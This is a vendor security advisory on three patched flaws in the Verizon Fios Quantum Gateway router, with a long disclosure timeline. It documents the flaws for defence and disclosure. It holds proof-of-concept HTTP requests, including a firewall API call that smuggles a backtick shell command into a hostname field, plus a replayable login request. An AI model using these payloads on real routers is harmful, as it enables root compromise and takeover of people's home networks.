Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Verizon Fios Quantum Gateway Multiple Vulnerabilities

High

Synopsis

Tenable has discovered multiple vulnerabilities in the Verizon Fios Quantum Gateway.

CVE-2019-3914: Authenticated Command Injection

A command injection vulnerability was discovered in the API backend. This vulnerability can be exploited remotely to achieve command execution with root privileges. An attacker must be authenticated to the device's administrative web application in order to perform the command injection.

This issue exists due to the way firewall access control rules are processed. Specifically, the vulnerability can be triggered by adding an access control rule for a network object with a crafted host name.

For example, if a network object is added with a hostname of "`whoami`" (note the backticks), and this object is used in a firewall access control rule, the 'whoami' command will be executed.

Below is a log entry in /chroot/mnt/log/user. Notice that `whoami` is incorporated into the iptables command.

user.err<11> bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES

Below is a proof of concept HTTP request. Note that the results of the command will not be returned. Please note that it is possible to obtain a root shell.

POST /api/firewall/accesscontrol HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
X-XSRF-TOKEN: 1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Cookie: Session=944817705; XSRF-TOKEN=1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Content-Length: 373
Content-Type: application/json
 
{"blockRule": true, "schedule": "", "networkObjects": [{"rules": [{"hostname": "`whoami`", "networkObjType": 4}], "type": 3, "name": "Scooby"}], "enabled": true, "hosts": [], "schedule1": {}, "services": []}

CVE-2019-3915: Login Replay

The login process is susceptible to replay. Given that HTTP is not enforced, an attacker could intercept a login request and subsequently replay it to gain access to the router's administrative web interface.

When a user attempts to log in, a salted SHA-512 password hash is POSTed. This is all the attacker needs to log in. For instance, a login request looks like such:

POST /api/login HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/json;charset=utf-8
Content-Length: 143
Connection: close
Cookie: test
 
{"password":"5e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e"}

CVE-2019-3916: Password Salt Information Disclosure

An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.

A proof of concept is below showing an HTTP request/response pair. Notice that the 'passwordSalt' is returned.

GET /api HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: test; bhr4UI2HasToRefresh=false; bhr4HasEnteredAdvanced=true; Session=; XSRF-TOKEN=

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Content-Length: 173
Date: Thu, 06 Dec 2018 13:00:40 GMT
Server: lighttpd/1.4.38
 
{"doSetupWizard":false,"requirePassword":true,"passwordSalt":"6299bfce-1d56-4a6c-9bd8-352dc9ce865c","isWireless":false,"error":1,"maxUsers":10,"denyState":0,"denyTimeout":0}

Solution

Upgrade to firmware version 02.02.00.13.

Disclosure Timeline

12/11/2018 - Disclosed to vendor. 90-day date is 03/12/2019.
12/12/2018 - Verizon Incident Response Team replies saying that the Python attachment was blocked. Tenable is asked to follow up with our point of contact.
12/12/2018 - Tenable replies, stating that we do not have a point of contact. We ask that our message is routed to the proper person.
12/14/2018 - No response was received from Verizon. Tenable follows up to determine the proper way of communicating.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418229.
12/14/2018 - Tenable receives a human response, indicating that we may send our disclosure and PoC. The 90-day date is moved to 3/14/2019 as a professional courtesy.
12/14/2018 - Tenable resends the disclosure and PoC.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418773.
12/14/2018 - Verizon contacts Tenable to ask for PoC.
12/14/2018 - Tenable resends the PoC again.
12/14/2018 - Verizon acknowledges they have received the PoC.
12/14/2018 - Verizon indicates that the command injection has been validated. They have opened a ticket with their vendor to address the issue, and they will send a follow-up email once a fix is confirmed.
12/17/2018 - Tenable asks if the other two bugs have been validated.
12/19/2018 - Verizon responds that the other two bugs will be "officially" handled by another group. In an unofficial capacity, these bugs were previously identified and on the roadmap to be remediated. The RCE was new, though.
12/19/2018 - Verizon responds again: "Verizon has examined the data provided and we are actively working with our engineering teams and vendor to evaluate and, as appropriate, address the reported vulnerabilities in a timely manner."
12/19/2018 - Tenable asks Verizon to keep us in the loop with any updates.
01/04/2019 - Tenable asks for an update.
01/04/2019 - Vecirt says they are still testing and validating the report. They will "take appropriate actions, including making required updates in a timely manner, if needed."
01/04/2019 - Tenable reaches out to another contact, hoping to gain more insight.
01/22/2019 - Tenable follows up: reminds Verizon of 90 date, asks for an update, and asks for preferred direct contact.
01/23/2019 - Tenable informs Verizon that CVE-2019-3914 through CVE-2019-3916 will be assigned for the discovered vulnerabilities.
01/23/2019 - Verizon responds. They are "still testing and will take appropriate actions, including making required updates in a timely manner, if needed." They will "have a response for the public report before the March 14, 2019 date."
01/24/2019 - Tenable asks if Verizon has a particular date in mind.
01/29/2019 - Verizon does "not have a specific anticipated date of completion." Nevertheless, they "certainly plan to continue providing updates to you as our validation and testing efforts progress, and are completed."
02/13/2019 - Tenable asks Verizon for an update.
02/19/2019 - Verizon says the bugs will be fixed in firmware version 2.2, and it will be deployed in the near future.
02/19/2019 - Tenable asks when version 2.2 will be deployed.
03/01/2019 - Verizon pushes firmware version 02.02.00.13.
03/01/2019 - Tenable notifies Verizon of intent to publish a research advisory prior to 3/14. Asks if Verizon plans to issue an advisory.
03/01/2019 - Verizon notifies Tenable that firmware updates are pushed in small batches, and the process won't be complete until March 13. Tenable is asked to delay an advisory until March 14th.
03/01/2019 - Tenable acknowledges the request and asks if Verizon plans to issue a security advisory.
03/04/2019 - Tenable agrees to wait until the 14th. Asks again whether Verizon will issue a security advisory.
03/05/2019 - Verizon says they will not issue an advisory. They will notify Tenable when the firmware update is fully deployed.
03/13/2019 - Verizon notifies Tenable that firmware updates have been fully deployed.
04/05/2019 - Verizon informs Tenable that a small percentage of their customers still need to be patched against these vulnerabilities.
04/09/2019 - Tenable releases the research advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2019-17
Credit:
Chris Lyne
CVSSv2 Base / Temporal Score:
8.5 / 6.8
CVSSv2 Vector:
AV:N/AC:M/Au:S/C:C/I:C/A:C
Affected Products:
FiOS-G1100 (Firmware Version: 02.01.00.05)
Risk Factor:
High

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training